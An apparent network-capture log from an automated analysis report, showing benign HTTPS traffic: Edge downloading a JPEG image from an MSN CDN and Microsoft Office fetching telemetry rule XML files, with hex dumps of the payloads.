2024-11-10 03:55:26 UTC	15864	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 22 26 79 a6 64 04 d3 74 02 41 94 82 74 a4 93 b9 57 bc 9c 11 8e 95 97 71 01 bd 70 96 69 75 45 dd 0b 96 ca bc ae d8 53 f3 3d c3 4f 04 d1 c2 1b fe eb e4 48 2e 28 8f a7 09 4f 81 dd 8a b5 a2 ce d5 46 53 08 32 d1 c8 df 29 90 08 8e 6c 84 6f 2e 38 20 db 4c b4 58 e8 ee 0f 89 3c 3d 40 e0 56 60 10 57 3f b9 8c cf 16 ba 75 e1 9d f6 f2 da 37 b8 fb af 09 c6 b2 a8 03 15 f3 cf 84 d7 97 31 9a 99 8e 85 f3 b9 61 71 7a 7e f6 3d eb e9 f0 f7 26 51 e3 ff 00 2d 97 69 e6 fa eb 5d 2a 3b 4c 0d 17 8e 6f 79 29 89 21 d2 a5 4b 2d 98 82 52 06 93 10 a0 18 12 19 40 01 d2 aa 50 00 14 a1 41 80 24 29 00 1d aa b0 80 0d 49 88 22 51 4e b0 42 eb 98 4c 24 2d ad 84 d0 10 08 dc ae 10 08 c0 11 98 1a a0 00 a8 59 f5 b8 90 d0 6f cd 0d 26 3b 08 b9 69 30 bd ad d4 af 17 c4 71 c3 40 7a 56 7a 76 e3 ed af 6e Data Ascii: "&ydtAtWqpiuES=OH.(OFS2)lo.8 LX<=@V`W?u71aqz~=&Q-i]*;Loy)!K-R@PA$)I"QNBL$-Yo&;i0q@zVzvn
2024-11-10 03:55:26 UTC	2887	IN	Data Raw: a3 52 ed a8 d2 d7 0d c5 68 86 02 b9 b0 e1 a4 69 6a 59 cd ff 00 c7 68 57 a6 da ac a9 56 87 10 d2 72 d5 6b a6 e1 c6 1d fb b4 d8 e1 c9 7a fe 11 e0 87 33 16 11 3c 9c 24 11 b4 6a 39 85 d9 d4 8f 28 82 41 f8 75 5e 33 d7 c3 f1 ac fe ad 20 d2 2b b4 7f 4e bb 0c 80 e1 b1 e2 21 ed b6 06 16 f2 bb ae f3 ec 80 14 b9 00 05 2e 40 01 ca d0 00 72 a4 00 1c b9 00 07 2e 40 32 72 e4 03 20 ab 40 01 cb 90 00 12 14 00 16 b9 00 07 2e 40 01 4a d0 00 54 2e 40 01 d0 ad 00 05 2b 40 01 cb 90 00 72 e4 03 27 2b 40 01 4a d0 00 72 e4 00 6a 5c 80 41 ca d0 00 0a b4 00 14 ad 00 07 2e 40 01 cb 90 00 52 e4 00 1c ba 10 00 72 b4 00 1c b9 00 07 2a 84 00 16 b9 00 c9 ca d0 0c 29 72 01 07 2a 40 01 6a 90 0c 96 a9 00 c9 6a 90 0c 39 72 00 0a 56 99 00 e5 c8 00 39 52 64 02 d5 20 c0 5a a4 80 0b 5c 98 04 e5 Data Ascii: RhijYhWVrkz3<$j9(Au^3 +N!.@r.@2r @.@JT.@+@r'+@Jrj\A.@Rr)r@jj9rV9Rd Z\
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: f2 c5 db dd 9e 19 a7 41 65 86 a5 13 4b 49 d6 49 53 dc 34 fe 9e c7 2c df 88 46 73 72 2c 3a d4 ac ad 89 71 88 4f 86 7b be 49 fd d5 af 4c ef 68 09 81 00 6f 54 3d 67 d3 a2 a1 d9 3d a1 f7 ec 26 cf 24 c6 81 ab 91 53 7c 13 37 b6 92 4f 31 4a 1b 38 de c1 23 ec bd a7 8b dd d1 3d 1d a9 84 80 00 08 4a 7b ae f8 23 5c 1b 22 d7 05 a9 39 f9 f2 68 a7 87 3a 71 4d 3e e9 84 e6 91 3b a3 2d d5 de cf 3f 55 a7 5b 59 4c a8 cc cb b6 6b 4c f1 af 2f 2d ca db 38 c2 a9 7b a9 0e b0 21 56 95 59 cb ce cb 1b a3 a9 d6 6d 56 1b 5c 2c b0 4b 1f 22 c0 d8 f4 ae 6e d5 ae 51 df 2f 54 73 61 93 e9 6c 23 c9 60 3a e5 1d 49 2d 7b 0d 36 6d 20 44 6d 85 e7 7f 75 3e 77 5e e7 f6 cf a2 37 35 10 38 97 96 90 0e 9d e9 6e 0e 24 82 d5 ae 33 6a 9a 61 ee 5d 22 ee f9 22 17 48 24 34 48 d7 c3 54 80 c7 d2 2e 9d 37 e2 Data Ascii: AeKIIS4,Fsr,:qO{ILhoT=g=&$S\|7O1J8#=J{#\"9h:qM>;-?U[YLkL/-8{!VYmV\,K"nQ/Tsal#`:I-{6m Dmu>w^758n$3ja]""H$4HT.7
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 02 97 c2 d4 11 c9 67 6e 8b 28 eb c6 79 6d 38 64 d3 75 20 2d aa 29 9b 8b a9 94 34 b8 f9 04 62 c0 d0 a5 16 cf 42 b9 51 b4 f4 c8 ab 10 ec 45 d3 22 ea c9 24 8e 6e 9d 17 32 aa 16 d3 dc 16 c7 96 eb a2 63 e9 cd f6 27 60 94 e5 4e 58 a5 b0 89 99 51 a9 35 d2 00 59 55 e5 67 9b 78 c7 0d f9 34 c8 94 79 48 e8 58 ce 13 b7 46 5c a9 1c 89 4d 5a ed 0c b4 d1 91 55 b0 54 aa 8d cc ba b1 e6 23 1a e2 cb 8a d3 2c 76 f3 75 9b 81 d2 14 ba a2 2d be 16 b0 39 af fb 1f 6e e3 e1 ab 48 0c 76 cb 15 93 25 b7 18 2c 72 9a ad ab a7 0c b7 34 c3 b3 d7 53 6e 3a c2 81 c2 f1 4d 7b 08 d1 d8 ae 6b 4e ce 5d 92 16 39 6e 24 b9 c4 ba de 93 d9 08 9f ea 13 37 d1 3f 2f 52 89 b7 9f 45 65 36 8b 27 6e f3 28 e7 35 bb 56 85 d9 cf cf aa fb f0 ac c5 e4 61 0b 83 75 ba 7a d1 5a 9d ee c3 d0 22 0f a8 fb 51 c0 fd 77 Data Ascii: gn(ym8du -)4bBQE"$n2c'`NXQ5YUgx4yHXF\MZUT#,vu-9nHv%,r4Sn:M{kN]9n$7?/REe6'n(5VauzZ"Qw
2024-11-10 03:55:26 UTC	7952	IN	Data Raw: e4 ef 27 d8 8a 0c 11 8e 83 c0 26 ce f2 92 94 8a e1 7f d2 3c 00 ea 54 5c 36 f5 a9 56 e1 da 5a a6 79 4e 38 8f e2 4b 19 7f 78 ed fa 2c f4 77 5e ab 96 09 2f a2 53 58 fc 0f 6a e6 d4 60 1f f2 0f 9e 84 27 66 ae 93 98 c7 b6 e2 ab 47 3f 6a ef 32 89 b4 d3 e7 98 7d 15 27 ab c4 be 70 74 78 18 ea 95 7f d7 61 f9 e4 84 d4 a6 07 fc 94 7a 11 7f f9 68 b7 b5 cb e1 b5 6b 48 15 2a 55 3a d5 61 e8 f6 22 7b c1 c5 87 90 f6 a7 cf ea fc 15 2a 2e af 7c 6d 2c a5 46 6d 5a 80 fb f4 fc 0a 38 6b b1 03 a0 7d 56 5c fe a9 f6 ad 2a e4 93 b6 36 7d 91 25 8e 35 9e 7f 5b 7c 0a 68 a4 d3 bf 93 42 cf e6 bd 35 f9 33 f9 a2 3d ef fd c3 f8 7d 8a 77 96 c6 ea d3 fe 55 3b bf ab f0 69 35 e8 ae 3d 18 dd fa d6 1b 84 e3 d9 ec 5a ce c9 1a 47 43 7f b4 b9 ec f1 74 5f a3 ae 5d 79 7e 2e 59 f5 fe 2c 6c bf 6b b1 4e Data Ascii: '&<T\6VZyN8Kx,w^/SXj`'fG?j2}'ptxazhkHU:a"{.\|m,FmZ8k}V\*6}%5[\|hB53=}wU;i5=ZGCt_]y~.Y,lkN
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: d1 64 39 f9 4a da 64 e5 b7 4e 5c fd bf 37 a1 31 db d1 8a cb 1d 8e cc 24 2e ee b7 3e 3c cd bc 7f 86 f4 72 9a ba 6d 8a c1 65 ae 9e a6 0f 33 e1 bb 9a be 70 2b 2d 74 75 47 3b 83 e1 bb 9a 5e 66 f5 9a b7 ea 62 e2 e8 76 b4 bc c0 b3 56 fd 4c 1c 5d 0e d6 8f 9a 16 72 db a9 8b 8f e1 bb 13 fc d5 9f 2b 6e a6 2e 4f 86 eb d3 43 cd 59 d2 b5 ea 64 e4 f8 6e cd 27 0a b0 65 42 95 7d 48 73 74 3a 74 9e ee 28 ac e7 5d 57 56 91 58 7c 3b 7c dd 31 3c 71 6b 18 ab f8 8c 2b 92 fb 0f 46 36 7e f2 b0 57 47 5b 91 e7 7c 17 aa dc f3 d6 06 62 ba fa 9c 4f 2f e1 3d 6d 46 f7 9a b0 3c c2 bb ba 9c 1d 55 e5 74 3d 5e 98 df f3 02 c2 15 4a ef ea 70 f5 bc ae 87 a9 f0 de 8f 36 2b 11 95 b7 af 47 6e 29 9b c6 e9 7a 99 7b 6f 53 4e b8 fa af 3d e6 11 8a ef 99 6d c9 d4 f1 2e 16 3d 5e 87 b8 a3 c5 01 63 a1 b0 Data Ascii: d9JdN\71$.><rme3p+-tuG;^fbvVL]r+n.OCYdn'eB}Hst:t(]WVX\|;\|1<qk+F6~WG[\|bO/=mF<Ut=^Jp6+Gn)z{oSN=m.=^c
2024-11-10 03:55:26 UTC	6065	IN	Data Raw: b1 68 8f 8c d7 38 f0 fc fd 4b af 77 f4 fe 31 c7 f0 f1 f1 70 fc 39 eb 3e ce ef 8d 9c ba d4 45 cb 45 da d5 e2 cf fd ab 76 b9 39 dc 6f 11 5b 5a bc 30 1b fd ab a7 f7 7a 4f bf f8 63 26 13 f5 38 fa 70 f3 b9 5f 97 f9 75 5c f3 cb f4 80 52 e1 3f 55 5e 23 f8 43 7b 8f 5a 1c 85 c7 de a0 ff 00 b2 1c 1a 3c 46 55 a6 f3 f4 9f 72 ea 9e 3f 57 2c 9e d7 8f db fe 57 f0 ef 9f 4d f0 ec 78 67 c3 1b ef 54 ac ee 72 3a 93 59 4d ec 12 fe 1a 9e 5d b9 a7 a8 b8 a3 ab dc f2 90 ae 53 f5 d5 49 ec 7a e5 f6 ff 00 0a 98 59 df db 9a 58 a9 f0 f6 46 5a 6d 7c 7e e6 b9 dd eb 4e 99 81 e9 14 80 fb 3f 80 47 fe e5 ef c7 d3 4c 6f d6 fc c4 be d4 ed cf d7 6e cc 64 d7 13 1f 93 33 ef 40 9f e9 f0 d4 ce c8 a6 56 c3 f8 96 30 7a 9c df cc 40 5b ea f9 e7 94 f9 b9 74 e0 b6 6f 8f 6f 1b f2 7a 7b 9e 08 8c e2 38 c8 Data Ascii: h8Kw1p9>EEv9o[Z0zOc&8p_u\R?U^#C{Z<FUr?W,WMxgTr:YM]SIzYXFZm\|~N?GLond3@V0z@[tooz{8
2024-11-10 03:55:26 UTC	16223	IN	Data Raw: 39 a4 b8 e9 af 81 98 4b 47 b3 97 14 eb 86 9b 63 4f 08 88 3e 37 e9 95 97 4d 9e a9 f2 da d1 cc 8e b9 40 6b c2 64 f0 4f a8 d0 2e 5b 1d bd a0 c2 a6 0b 18 91 a6 b5 72 db 9c 42 64 9c b4 ae 7f 3c 03 23 5c 7d 2c 74 ef d3 a7 14 c0 ca 8e 36 1e 93 b2 b4 81 ce 12 31 3c 04 d9 63 d3 81 3b 60 47 d4 a9 2e 04 7e 87 7f 30 a9 31 bf 40 91 eb e8 36 2d 9e 5b 00 63 c8 31 e9 bc e2 e7 72 d1 a9 25 a4 68 5e e7 11 30 65 dd a8 31 dd 9c 9e 34 e8 75 ae fc ba fb a7 e8 95 35 98 34 6e 3f ac 48 e6 09 48 2e f0 5d a7 f9 13 e9 b8 c7 f5 3c 5a e4 91 c4 39 9a 96 13 fc d7 ec 08 2d 15 df 80 ea 1b af 01 ae 6d b0 f5 0e 6a 83 8b c9 f5 53 12 0d a3 32 b2 4e fe 86 36 33 31 99 cd 1a 5e 7b 82 26 cb 41 8f 25 c6 d6 12 09 e8 4c be ea 1e 5e 4b c9 7b 82 db 6c 69 ea b7 62 60 79 22 1c 29 78 93 a6 e9 1d e9 97 9a Data Ascii: 9KGcO>7M@kdO.[rBd<#\},t61<c;`G.~01@6-[c1r%h^0e14u54n?HH.]<Z9-mjS2N631^{&A%L^K{lib`y")x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49871	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	634	OUT	GET /tenant/amp/entityid/BB1msOOW.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:26 UTC	520	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msOOW Last-Modified: Sat, 26 Oct 2024 02:04:36 GMT X-Source-Length: 76188 X-Datacenter: northeu X-ActivityId: 77e48659-047f-458a-b9dd-8f9e0ce592d7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 76188 Cache-Control: public, max-age=295750 Expires: Wed, 13 Nov 2024 14:04:36 GMT Date: Sun, 10 Nov 2024 03:55:26 GMT Connection: close
2024-11-10 03:55:26 UTC	15864	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: e5 b3 89 ae 12 0f c8 8e 44 73 07 25 6c 2f 89 78 37 88 0d 0e a0 75 2e 5c e8 bf 65 c0 91 84 4c 45 c8 e1 c2 b0 be d6 c3 3c 57 8f 3c 74 cb eb f1 72 7e 48 f5 8e a9 d3 a5 09 d7 37 60 b5 09 91 92 ad 5a 84 18 b5 0b 51 18 b5 6a 11 2c 21 6a d4 46 21 6a d5 51 88 5a b5 11 8b 50 b5 10 21 6a 11 02 10 84 40 85 ab 10 08 5a b5 06 21 6a 10 62 d4 2d 44 62 13 2c 41 8b 56 a1 06 21 6a 10 62 d4 2d 44 62 16 ad 40 a8 4c 84 46 2d 42 d4 18 85 ab 51 18 85 a8 50 62 16 a1 50 21 0b 51 18 85 a8 41 88 5a 84 18 85 a8 41 88 5a 84 18 84 2d 41 88 5a 84 18 85 a8 41 88 5a b1 14 21 08 40 21 08 41 88 5a 84 18 85 a8 50 2a 13 21 02 a1 6a 10 62 10 84 56 21 6a 10 62 16 a1 02 a1 32 54 50 b1 6a 10 62 c4 c9 51 42 c5 a8 45 2a 13 25 40 2c 5a 85 14 a8 5a b1 14 a8 5a b1 15 8b 13 25 45 62 c5 ab 14 6c a8 5a Data Ascii: Ds%l/x7u.\eLE<W<tr~H7`ZQj,!jF!jQZP!j@Z!jb-Db,AV!jb-Db@LF-BQPbP!QAZAZ-AZAZ!@!AZP!jbV!jb2TPjbQBE%@,ZZZ%EblZ
2024-11-10 03:55:26 UTC	3220	IN	Data Raw: 73 2b e6 37 b5 45 f7 b1 38 bc 17 49 04 bc be 01 14 18 48 0e c4 0f 32 66 14 a3 54 cd 46 a2 e3 ee 5c c3 6f 50 5c e7 d1 c4 80 41 6b 5a e0 28 1a c2 05 7c a5 70 58 f6 b8 92 58 0b a0 00 72 11 bc 81 15 e5 c9 7a 63 1a 85 8d aa bb bb 36 b5 21 81 e1 83 0b 9e 63 37 d6 84 4f b4 72 e3 22 aa fd 96 d8 73 8b bd dd ed 8c 24 b9 8e 0c 66 c3 89 38 41 12 e9 82 26 5d 45 cc b5 70 62 2f 27 aa 45 a3 b2 d0 04 02 22 30 bb e9 13 26 33 2a dd bb 8e 7d b0 e0 48 e8 b2 05 23 65 c2 30 80 4c 00 41 ab a4 98 13 2a 3d 10 f4 56 c8 f7 9d 3f 55 c5 ae c0 00 c5 42 1d 8a 20 98 87 7e f0 56 6d 6a 1c 3c 41 ac b7 18 1a cc 2e 14 15 26 04 72 dd dc b8 77 61 ad b3 2e 0e 0c 6d b3 49 13 83 11 20 4e 52 e8 95 27 53 a0 f6 bd cd cc 17 e2 8d d3 15 e4 09 73 b9 67 0b 0e d3 e3 a7 47 b7 b9 75 c0 56 30 93 47 67 c5 71 Data Ascii: s+7E8IH2fTF\oP\AkZ(\|pXXrzc6!c7Or"s$f8A&]Epb/'E"0&3}H#e0LA=V?UB ~Vmj<A.&rwa.mI NR'SsgGuV0Ggq
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: d1 8a 0e 03 3e 49 6d e9 2e 62 c6 5d 6d ad 20 43 b1 62 31 19 e1 86 8f 5c c2 8a e6 b0 9b 6c be e7 b7 15 4e 6e 22 4e 41 d2 59 b2 6b 94 9e 6b c0 6b f1 c8 0e 0e 11 94 e6 6a 6b 41 1d ab ea d7 9f a5 0d 38 a5 8d 24 c3 b0 9d a0 68 62 68 41 95 f3 df 16 b7 80 30 b1 c2 e5 a0 5e d0 e1 93 49 32 1b 90 a4 65 13 ce a8 e7 94 6c e4 e9 6e f4 ee b0 b8 b9 90 26 5b 18 8f 61 a1 5e 85 de 25 7a f3 5f 68 87 dd 61 63 85 41 71 1f bd 2d 12 22 99 13 50 bc f3 30 32 e4 86 3a eb 3a 6d 27 6a 08 df 51 02 87 2f 5a 8f ae 2d b8 ec 92 d7 08 22 48 ae fa 11 3d b4 55 ce e9 d7 d1 eb 06 99 97 08 25 d8 88 c3 b2 62 5b 91 75 44 56 a0 09 3b d7 b2 66 a6 e5 cb 16 ae 3a 0b dc d0 e7 0a 6c e2 3f bc 77 51 79 bd 05 f7 fb b3 da f1 64 80 65 8c 2d 61 da cf 11 06 91 26 8a c7 bd 39 c5 b8 89 88 c4 5c ea fb 23 69 c4 Data Ascii: >Im.b]m Cb1\lNn"NAYkkkjkA8$hbhA0^I2eln&[a^%z_hacAq-"P02::m'jQ/Z-"H=U%b[uDV;f:l?wQyde-a&9\#i
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 9b 4e ef e2 5c fd ab df ac b1 fa 4b 66 8c 63 5f fb d8 b5 13 eb 2b a8 75 9a 06 f3 d3 76 1b a7 e6 a2 3e 23 a1 e6 e6 53 97 52 e0 1d c1 cb 7b fa b8 d6 3e 61 c2 76 8e e8 f6 74 c0 f1 2e 3f 84 ab 3e db 9b 42 c1 d8 18 4f c4 af 52 3c 47 c3 62 71 b2 77 63 71 fe f3 82 b0 cf 12 d2 1f e8 f0 f9 be f3 1b f8 6e f8 25 cf 86 74 e3 fe d0 f1 4d 63 5b 5e 91 78 dc 5a 47 f7 42 9a 6d 9b 6e 07 4a 64 c6 13 39 56 b9 c9 5e df af 6d d5 07 4c 7f fe 63 07 ab 0a a9 7b ab 72 8c 76 8f c9 d7 ed bf e4 d5 6c 8c 6b a4 c7 db cf c5 e3 7a 36 1d fc 3b c3 80 3f fb 65 2b 6c 5b 6b a9 61 ce fc eb 84 7f f9 85 ea bd d6 f0 ac e9 07 e5 36 3b 95 9b 76 c8 cf dd 49 fd d7 37 e7 45 ab 73 d3 2f 3f d3 14 ff 00 75 2d e3 d6 7f e0 c2 80 3b a6 60 b6 04 fd 4d ba e0 3b 71 85 ed 83 1b f5 74 19 fc c1 f9 84 ed 6d a9 a3 Data Ascii: N\Kfc_+uv>#SR{>avt.?>BOR<Gbqwcqn%tMc[^xZGBmnJd9V^mLc{rvlkz6;?e+l[ka6;vI7Es/?u-;`M;qtm
2024-11-10 03:55:26 UTC	7952	IN	Data Raw: 25 7d ab 43 a3 66 96 d8 00 54 2e 17 87 f8 48 d3 6a 7a a7 90 a7 68 85 ec d6 79 73 bd a3 a3 5c 1c 5a 62 f2 8d cc b5 2a 17 9d ec 32 d4 88 54 32 12 a1 03 21 2a d4 0c 84 a8 44 32 12 a1 03 21 2a 10 32 c5 88 45 0b 16 a5 40 2c 5a 84 68 2c 80 b5 08 19 64 4a 10 8c 99 6a 45 a8 19 09 56 22 1d 09 10 81 d0 91 08 1d 09 10 81 d0 91 08 1d 09 10 81 d0 91 08 1d 09 50 81 d0 91 6a 06 42 54 20 65 a9 10 81 d0 95 08 87 94 24 5a 88 65 a9 10 81 d0 95 08 19 0b 11 28 19 09 56 a2 35 0b 10 88 64 25 5a 85 35 0b 10 89 46 42 55 a8 53 56 a5 42 21 90 b1 08 35 0b 10 83 50 b1 08 35 0b 16 a0 10 84 20 16 ac 42 32 64 25 42 06 42 54 20 65 8b 16 a0 c4 21 08 04 21 0a 28 42 10 8a 10 84 20 c5 88 42 80 42 10 94 a1 2a d5 89 4d 05 8b 52 a5 2b 16 2d 58 a5 29 52 29 12 25 34 8d 7c eb fc c9 e1 ce b8 5b a9 Data Ascii: %}CfT.Hjzhys\Zb2T2!D2!2E@,Zh,dJjEV"PjBT e$Ze(V5d%Z5FBUSVB!5P5 B2d%BBT e!!(B BBMR+-X)R)%4\|[

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.5	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 814b8126-e01e-0085-4945-32c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035526Z-17df447cdb57srlrhC1DFWwgas00000008q0000000005nmd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:26 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.5	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035526Z-16547b76f7f9bs6dhC1DFWt3rg0000000c1000000000fv44 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:26 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.5	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:26 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:26 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 9180e243-301e-001f-18ad-31aa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035526Z-17df447cdb5fzdpxhC1DFWdd3400000008hg00000000c4ge x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
